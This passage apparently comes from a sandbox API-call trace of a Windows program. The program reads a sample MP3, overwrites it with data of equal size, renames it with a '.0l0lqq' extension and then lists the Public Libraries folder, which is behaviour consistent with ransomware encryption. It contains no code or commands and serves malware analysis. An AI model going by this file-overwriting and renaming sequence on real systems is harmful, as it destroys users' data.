lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.480] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0249.481] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0249.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0249.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0249.482] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x7031648 | out: lpFileInformation=0x7031648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0249.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0249.482] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.482] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0249.482] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0249.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0249.482] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.487] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.487] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0249.487] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0249.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0249.487] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0249.487] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x70346bc | out: lpFileInformation=0x70346bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0249.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0249.487] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0249.487] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x703479c | out: lpFileInformation=0x703479c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0249.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0249.489] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0249.489] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x538 [0249.489] GetFileType (hFile=0x538) returned 0x1 [0249.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0249.489] GetFileType (hFile=0x538) returned 0x1 [0249.489] GetFileSize (in: hFile=0x538, lpFileSizeHigh=0x26dd80 | out: lpFileSizeHigh=0x26dd80*=0x0) returned 0x49e459 [0249.490] ReadFile (in: hFile=0x538, lpBuffer=0x90c1018, nNumberOfBytesToRead=0x49e459, lpNumberOfBytesRead=0x26dd2c, lpOverlapped=0x0 | out: lpBuffer=0x90c1018*, lpNumberOfBytesRead=0x26dd2c*=0x49e459, lpOverlapped=0x0) returned 1 [0249.578] CloseHandle (hObject=0x538) returned 1 [0249.826] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0249.826] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x538 [0249.834] GetFileType (hFile=0x538) returned 0x1 [0249.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0249.835] GetFileType (hFile=0x538) returned 0x1 [0249.835] WriteFile (in: hFile=0x538, lpBuffer=0x3276150*, nNumberOfBytesToWrite=0x49e459, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x3276150*, lpNumberOfBytesWritten=0x26dd1c*=0x49e459, lpOverlapped=0x0) returned 1 [0249.965] CloseHandle (hObject=0x538) returned 1 [0250.108] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0250.108] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.0l0lqq", lpFilePart=0x0) returned 0x38 [0250.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0250.108] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x661b7190, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0250.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0250.108] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.0l0lqq" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.0l0lqq")) returned 1 [0250.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.113] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries", lpFilePart=0x0) returned 0x19 [0250.113] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\", lpFilePart=0x0) returned 0x1a [0250.113] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.113] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.114] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.114] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0250.114] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0250.114] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.114] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries", lpFilePart=0x0) returned 0x19 [0250.114] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\", lpFilePart=0x0) returned 0x1a [0250.114] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.115] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.115] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.115] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0250.115] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.115] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.115] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.115] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.115] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", 